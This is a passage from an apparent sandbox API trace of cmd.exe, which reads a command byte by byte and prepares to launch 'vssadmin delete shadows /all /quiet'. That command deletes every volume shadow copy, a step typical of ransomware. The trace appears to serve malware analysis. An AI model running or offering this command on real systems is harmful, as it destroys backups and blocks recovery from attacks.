nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1bf7a8, lpOverlapped=0x0 | out: lpBuffer=0x4a09c320*, lpNumberOfBytesRead=0x1bf7a8*=0x1, lpOverlapped=0x0) returned 1 [0262.854] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a09c320, cbMultiByte=1, lpWideCharStr=0x4a09e334, cchWideChar=1 | out: lpWideCharStr="e select=1251\n") returned 1 [0262.854] _get_osfhandle (_FileHandle=0) returned 0xe8 [0262.854] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0262.854] ReadFile (in: hFile=0xe8, lpBuffer=0x4a09c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1bf7a8, lpOverlapped=0x0 | out: lpBuffer=0x4a09c320*, lpNumberOfBytesRead=0x1bf7a8*=0x1, lpOverlapped=0x0) returned 1 [0262.854] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a09c320, cbMultiByte=1, lpWideCharStr=0x4a09e336, cchWideChar=1 | out: lpWideCharStr="lselect=1251\n") returned 1 [0262.854] _get_osfhandle (_FileHandle=0) returned 0xe8 [0262.854] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0262.854] ReadFile (in: hFile=0xe8, lpBuffer=0x4a09c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1bf7a8, lpOverlapped=0x0 | out: lpBuffer=0x4a09c320*, lpNumberOfBytesRead=0x1bf7a8*=0x1, lpOverlapped=0x0) returned 1 [0262.854] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a09c320, cbMultiByte=1, lpWideCharStr=0x4a09e338, cchWideChar=1 | out: lpWideCharStr="eelect=1251\n") returned 1 [0262.854] _get_osfhandle (_FileHandle=0) returned 0xe8 [0262.854] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0262.854] ReadFile (in: hFile=0xe8, lpBuffer=0x4a09c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1bf7a8, lpOverlapped=0x0 | out: lpBuffer=0x4a09c320*, lpNumberOfBytesRead=0x1bf7a8*=0x1, lpOverlapped=0x0) returned 1 [0262.854] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a09c320, cbMultiByte=1, lpWideCharStr=0x4a09e33a, cchWideChar=1 | out: lpWideCharStr="tlect=1251\n") returned 1 [0262.855] _get_osfhandle (_FileHandle=0) returned 0xe8 [0262.855] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0262.855] ReadFile (in: hFile=0xe8, lpBuffer=0x4a09c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1bf7a8, lpOverlapped=0x0 | out: lpBuffer=0x4a09c320*, lpNumberOfBytesRead=0x1bf7a8*=0x1, lpOverlapped=0x0) returned 1 [0262.855] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a09c320, cbMultiByte=1, lpWideCharStr=0x4a09e33c, cchWideChar=1 | out: lpWideCharStr="eect=1251\n") returned 1 [0262.855] _get_osfhandle (_FileHandle=0) returned 0xe8 [0262.855] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0262.855] ReadFile (in: hFile=0xe8, lpBuffer=0x4a09c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1bf7a8, lpOverlapped=0x0 | out: lpBuffer=0x4a09c320*, lpNumberOfBytesRead=0x1bf7a8*=0x1, lpOverlapped=0x0) returned 1 [0262.855] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a09c320, cbMultiByte=1, lpWideCharStr=0x4a09e33e, cchWideChar=1 | out: lpWideCharStr=" ct=1251\n") returned 1 [0262.855] _get_osfhandle (_FileHandle=0) returned 0xe8 [0262.855] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0262.855] ReadFile (in: hFile=0xe8, lpBuffer=0x4a09c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1bf7a8, lpOverlapped=0x0 | out: lpBuffer=0x4a09c320*, lpNumberOfBytesRead=0x1bf7a8*=0x1, lpOverlapped=0x0) returned 1 [0262.855] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a09c320, cbMultiByte=1, lpWideCharStr=0x4a09e340, cchWideChar=1 | out: lpWideCharStr="st=1251\n") returned 1 [0262.855] _get_osfhandle (_FileHandle=0) returned 0xe8 [0262.855] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0262.855] ReadFile (in: hFile=0xe8, lpBuffer=0x4a09c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1bf7a8, lpOverlapped=0x0 | out: lpBuffer=0x4a09c320*, lpNumberOfBytesRead=0x1bf7a8*=0x1, lpOverlapped=0x0) returned 1 [0262.855] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a09c320, cbMultiByte=1, lpWideCharStr=0x4a09e342, cchWideChar=1 | out: lpWideCharStr="h=1251\n") returned 1 [0262.855] _get_osfhandle (_FileHandle=0) returned 0xe8 [0262.855] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0262.855] ReadFile (in: hFile=0xe8, lpBuffer=0x4a09c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1bf7a8, lpOverlapped=0x0 | out: lpBuffer=0x4a09c320*, lpNumberOfBytesRead=0x1bf7a8*=0x1, lpOverlapped=0x0) returned 1 [0262.855] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a09c320, cbMultiByte=1, lpWideCharStr=0x4a09e344, cchWideChar=1 | out: lpWideCharStr="a1251\n") returned 1 [0262.855] _get_osfhandle (_FileHandle=0) returned 0xe8 [0262.855] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0262.855] ReadFile (in: hFile=0xe8, lpBuffer=0x4a09c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1bf7a8, lpOverlapped=0x0 | out: lpBuffer=0x4a09c320*, lpNumberOfBytesRead=0x1bf7a8*=0x1, lpOverlapped=0x0) returned 1 [0262.855] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a09c320, cbMultiByte=1, lpWideCharStr=0x4a09e346, cchWideChar=1 | out: lpWideCharStr="d251\n") returned 1 [0262.855] _get_osfhandle (_FileHandle=0) returned 0xe8 [0262.855] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0262.855] ReadFile (in: hFile=0xe8, lpBuffer=0x4a09c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1bf7a8, lpOverlapped=0x0 | out: lpBuffer=0x4a09c320*, lpNumberOfBytesRead=0x1bf7a8*=0x1, lpOverlapped=0x0) returned 1 [0262.855] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a09c320, cbMultiByte=1, lpWideCharStr=0x4a09e348, cchWideChar=1 | out: lpWideCharStr="o51\n") returned 1 [0262.855] _get_osfhandle (_FileHandle=0) returned 0xe8 [0262.855] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0262.855] ReadFile (in: hFile=0xe8, lpBuffer=0x4a09c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1bf7a8, lpOverlapped=0x0 | out: lpBuffer=0x4a09c320*, lpNumberOfBytesRead=0x1bf7a8*=0x1, lpOverlapped=0x0) returned 1 [0262.855] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a09c320, cbMultiByte=1, lpWideCharStr=0x4a09e34a, cchWideChar=1 | out: lpWideCharStr="w1\n") returned 1 [0262.855] _get_osfhandle (_FileHandle=0) returned 0xe8 [0262.855] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0262.855] ReadFile (in: hFile=0xe8, lpBuffer=0x4a09c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1bf7a8, lpOverlapped=0x0 | out: lpBuffer=0x4a09c320*, lpNumberOfBytesRead=0x1bf7a8*=0x1, lpOverlapped=0x0) returned 1 [0262.855] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a09c320, cbMultiByte=1, lpWideCharStr=0x4a09e34c, cchWideChar=1 | out: lpWideCharStr="s\n") returned 1 [0262.855] _get_osfhandle (_FileHandle=0) returned 0xe8 [0262.855] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0262.856] ReadFile (in: hFile=0xe8, lpBuffer=0x4a09c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1bf7a8, lpOverlapped=0x0 | out: lpBuffer=0x4a09c320*, lpNumberOfBytesRead=0x1bf7a8*=0x1, lpOverlapped=0x0) returned 1 [0262.856] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a09c320, cbMultiByte=1, lpWideCharStr=0x4a09e34e, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0262.856] _get_osfhandle (_FileHandle=0) returned 0xe8 [0262.856] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0262.856] ReadFile (in: hFile=0xe8, lpBuffer=0x4a09c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1bf7a8, lpOverlapped=0x0 | out: lpBuffer=0x4a09c320*, lpNumberOfBytesRead=0x1bf7a8*=0x1, lpOverlapped=0x0) returned 1 [0262.856] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a09c320, cbMultiByte=1, lpWideCharStr=0x4a09e350, cchWideChar=1 | out: lpWideCharStr="/") returned 1 [0262.856] _get_osfhandle (_FileHandle=0) returned 0xe8 [0262.856] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0262.856] ReadFile (in: hFile=0xe8, lpBuffer=0x4a09c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1bf7a8, lpOverlapped=0x0 | out: lpBuffer=0x4a09c320*, lpNumberOfBytesRead=0x1bf7a8*=0x1, lpOverlapped=0x0) returned 1 [0262.856] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a09c320, cbMultiByte=1, lpWideCharStr=0x4a09e352, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0262.856] _get_osfhandle (_FileHandle=0) returned 0xe8 [0262.856] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0262.856] ReadFile (in: hFile=0xe8, lpBuffer=0x4a09c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1bf7a8, lpOverlapped=0x0 | out: lpBuffer=0x4a09c320*, lpNumberOfBytesRead=0x1bf7a8*=0x1, lpOverlapped=0x0) returned 1 [0262.856] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a09c320, cbMultiByte=1, lpWideCharStr=0x4a09e354, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0262.856] _get_osfhandle (_FileHandle=0) returned 0xe8 [0262.856] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0262.856] ReadFile (in: hFile=0xe8, lpBuffer=0x4a09c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1bf7a8, lpOverlapped=0x0 | out: lpBuffer=0x4a09c320*, lpNumberOfBytesRead=0x1bf7a8*=0x1, lpOverlapped=0x0) returned 1 [0262.856] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a09c320, cbMultiByte=1, lpWideCharStr=0x4a09e356, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0262.856] _get_osfhandle (_FileHandle=0) returned 0xe8 [0262.856] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0262.856] ReadFile (in: hFile=0xe8, lpBuffer=0x4a09c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1bf7a8, lpOverlapped=0x0 | out: lpBuffer=0x4a09c320*, lpNumberOfBytesRead=0x1bf7a8*=0x1, lpOverlapped=0x0) returned 1 [0262.856] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a09c320, cbMultiByte=1, lpWideCharStr=0x4a09e358, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0262.856] _get_osfhandle (_FileHandle=0) returned 0xe8 [0262.856] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0262.856] ReadFile (in: hFile=0xe8, lpBuffer=0x4a09c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1bf7a8, lpOverlapped=0x0 | out: lpBuffer=0x4a09c320*, lpNumberOfBytesRead=0x1bf7a8*=0x1, lpOverlapped=0x0) returned 1 [0262.856] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a09c320, cbMultiByte=1, lpWideCharStr=0x4a09e35a, cchWideChar=1 | out: lpWideCharStr="/") returned 1 [0262.856] _get_osfhandle (_FileHandle=0) returned 0xe8 [0262.856] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0262.856] ReadFile (in: hFile=0xe8, lpBuffer=0x4a09c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1bf7a8, lpOverlapped=0x0 | out: lpBuffer=0x4a09c320*, lpNumberOfBytesRead=0x1bf7a8*=0x1, lpOverlapped=0x0) returned 1 [0262.856] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a09c320, cbMultiByte=1, lpWideCharStr=0x4a09e35c, cchWideChar=1 | out: lpWideCharStr="q") returned 1 [0262.856] _get_osfhandle (_FileHandle=0) returned 0xe8 [0262.856] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0262.856] ReadFile (in: hFile=0xe8, lpBuffer=0x4a09c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1bf7a8, lpOverlapped=0x0 | out: lpBuffer=0x4a09c320*, lpNumberOfBytesRead=0x1bf7a8*=0x1, lpOverlapped=0x0) returned 1 [0262.856] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a09c320, cbMultiByte=1, lpWideCharStr=0x4a09e35e, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0262.856] _get_osfhandle (_FileHandle=0) returned 0xe8 [0262.856] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0262.856] ReadFile (in: hFile=0xe8, lpBuffer=0x4a09c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1bf7a8, lpOverlapped=0x0 | out: lpBuffer=0x4a09c320*, lpNumberOfBytesRead=0x1bf7a8*=0x1, lpOverlapped=0x0) returned 1 [0262.856] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a09c320, cbMultiByte=1, lpWideCharStr=0x4a09e360, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0262.857] _get_osfhandle (_FileHandle=0) returned 0xe8 [0262.857] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0262.857] ReadFile (in: hFile=0xe8, lpBuffer=0x4a09c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1bf7a8, lpOverlapped=0x0 | out: lpBuffer=0x4a09c320*, lpNumberOfBytesRead=0x1bf7a8*=0x1, lpOverlapped=0x0) returned 1 [0262.857] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a09c320, cbMultiByte=1, lpWideCharStr=0x4a09e362, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0262.857] _get_osfhandle (_FileHandle=0) returned 0xe8 [0262.857] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0262.857] ReadFile (in: hFile=0xe8, lpBuffer=0x4a09c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1bf7a8, lpOverlapped=0x0 | out: lpBuffer=0x4a09c320*, lpNumberOfBytesRead=0x1bf7a8*=0x1, lpOverlapped=0x0) returned 1 [0262.857] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a09c320, cbMultiByte=1, lpWideCharStr=0x4a09e364, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0262.857] _get_osfhandle (_FileHandle=0) returned 0xe8 [0262.857] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0262.857] ReadFile (in: hFile=0xe8, lpBuffer=0x4a09c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1bf7a8, lpOverlapped=0x0 | out: lpBuffer=0x4a09c320*, lpNumberOfBytesRead=0x1bf7a8*=0x1, lpOverlapped=0x0) returned 1 [0262.857] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a09c320, cbMultiByte=1, lpWideCharStr=0x4a09e366, cchWideChar=1 | out: lpWideCharStr="\n") returned 1 [0262.857] _get_osfhandle (_FileHandle=0) returned 0xe8 [0262.857] GetFileType (hFile=0xe8) returned 0x3 [0262.857] _get_osfhandle (_FileHandle=0) returned 0xe8 [0262.857] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0262.857] _get_osfhandle (_FileHandle=1) returned 0xf4 [0262.857] GetFileType (hFile=0xf4) returned 0x3 [0262.857] _get_osfhandle (_FileHandle=1) returned 0xf4 [0262.857] WideCharToMultiByte (in: CodePage=0x4e3, dwFlags=0x0, lpWideCharStr="vssadmin delete shadows /all /quiet\n", cchWideChar=-1, lpMultiByteStr=0x4a09c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vssadmin delete shadows /all /quiet\n", lpUsedDefaultChar=0x0) returned 37 [0262.857] WriteFile (in: hFile=0xf4, lpBuffer=0x4a09c320*, nNumberOfBytesToWrite=0x24, lpNumberOfBytesWritten=0x1bf788, lpOverlapped=0x0 | out: lpBuffer=0x4a09c320*, lpNumberOfBytesWritten=0x1bf788*=0x24, lpOverlapped=0x0) returned 1 [0262.857] GetProcessHeap () returned 0x280000 [0262.857] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4012) returned 0x2a1010 [0262.857] GetProcessHeap () returned 0x280000 [0262.857] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2a1010 | out: hHeap=0x280000) returned 1 [0262.857] GetProcessHeap () returned 0x280000 [0262.858] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xb0) returned 0x299840 [0262.858] GetProcessHeap () returned 0x280000 [0262.858] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x22) returned 0x294630 [0262.858] GetProcessHeap () returned 0x280000 [0262.858] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x48) returned 0x2a0090 [0262.858] GetConsoleOutputCP () returned 0x4e3 [0262.858] GetCPInfo (in: CodePage=0x4e3, lpCPInfo=0x4a09bfe0 | out: lpCPInfo=0x4a09bfe0) returned 1 [0262.858] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0262.858] GetConsoleTitleW (in: lpConsoleTitle=0x1bf740, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0262.859] GetProcessHeap () returned 0x280000 [0262.859] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x218) returned 0x29aae0 [0262.859] GetProcessHeap () returned 0x280000 [0262.859] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x5a) returned 0x299a50 [0262.859] GetProcessHeap () returned 0x280000 [0262.859] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x420) returned 0x29b9a0 [0262.859] SetErrorMode (uMode=0x0) returned 0x0 [0262.859] SetErrorMode (uMode=0x1) returned 0x0 [0262.859] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x29b9b0, lpFilePart=0x1befd0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x1befd0*="system32") returned 0x13 [0262.859] SetErrorMode (uMode=0x0) returned 0x1 [0262.859] GetProcessHeap () returned 0x280000 [0262.859] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x29b9a0, Size=0x4a) returned 0x29b9a0 [0262.859] GetProcessHeap () returned 0x280000 [0262.859] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x29b9a0) returned 0x4a [0262.859] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a08f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0262.859] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0262.859] GetProcessHeap () returned 0x280000 [0262.859] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x104) returned 0x295bb0 [0262.859] GetProcessHeap () returned 0x280000 [0262.859] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x1f8) returned 0x29ba00 [0262.859] GetProcessHeap () returned 0x280000 [0262.859] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x29ba00, Size=0x106) returned 0x29ba00 [0262.859] GetProcessHeap () returned 0x280000 [0262.859] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x29ba00) returned 0x106 [0262.859] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a08f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0262.859] GetProcessHeap () returned 0x280000 [0262.859] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xe8) returned 0x299c60 [0262.859] GetProcessHeap () returned 0x280000 [0262.859] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x299c60, Size=0x7e) returned 0x299c60 [0262.859] GetProcessHeap () returned 0x280000 [0262.859] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x299c60) returned 0x7e [0262.859] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0262.860] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.*", fInfoLevelId=0x1, lpFindFileData=0x1bed40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1bed40) returned 0x295cc0 [0262.860] FindClose (in: hFindFile=0x295cc0 | out: hFindFile=0x295cc0) returned 1 [0262.860] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.COM", fInfoLevelId=0x1, lpFindFileData=0x1bed40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1bed40) returned 0xffffffffffffffff [0262.860] GetLastError () returned 0x2 [0262.860] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.EXE", fInfoLevelId=0x1, lpFindFileData=0x1bed40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1bed40) returned 0x2a1040 [0262.860] FindClose (in: hFindFile=0x2a1040 | out: hFindFile=0x2a1040) returned 1 [0262.860] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0262.860] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0262.860] GetConsoleTitleW (in: lpConsoleTitle=0x1bf290, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0262.860] GetProcessHeap () returned 0x280000 [0262.860] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x21c) returned 0x29bb20 [0262.860] GetConsoleTitleW (in: lpConsoleTitle=0x29bb30, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0262.860] GetProcessHeap () returned 0x280000 [0262.860] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x29bb20, Size=0xa2) returned 0x29bb20 [0262.860] GetProcessHeap () returned 0x280000 [0262.860] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x29bb20) returned 0xa2 [0262.860] SetConsoleTitleW (lpConsoleTitle="C:\\Windows\\system32\\cmd.exe - vssadmin delete shadows /all /quiet") returned 1 [0262.861] GetProcessHeap () returned 0x280000 [0262.861] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x29bb20 | out: hHeap=0x280000) returned 1 [0262.861] InitializeProcThreadAttributeList (in: lpAttributeList=0x1bf048, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1bf008 | out: lpAttributeList=0x1bf048, lpSize=0x1bf008) returned 1 [0262.861] UpdateProcThreadAttribute (in: lpAttributeList=0x1bf048, dwFlags=0x0, Attribute=0x60001, lpValue=0x1beff8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1bf048, lpPreviousValue=0x0) returned 1 [0262.861] GetStartupInfoW (in: lpStartupInfo=0x1bf160 | out: lpStartupInfo=0x1bf160*(cb=0x68, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x101, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xe8, hStdOutput=0xf4, hStdError=0xf4)) [0262.861] GetProcessHeap () returned 0x280000 [0262.861] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x20) returned 0x294660 [0262.861] _wcsnicmp (_String1="COPYCMD", _String2="=::=::\\", _MaxCount=0x7) returned 38 [0262.861] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0262.861] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0262.861] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0262.861] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0262.861] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0262.861] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0262.861] _wcsnicmp 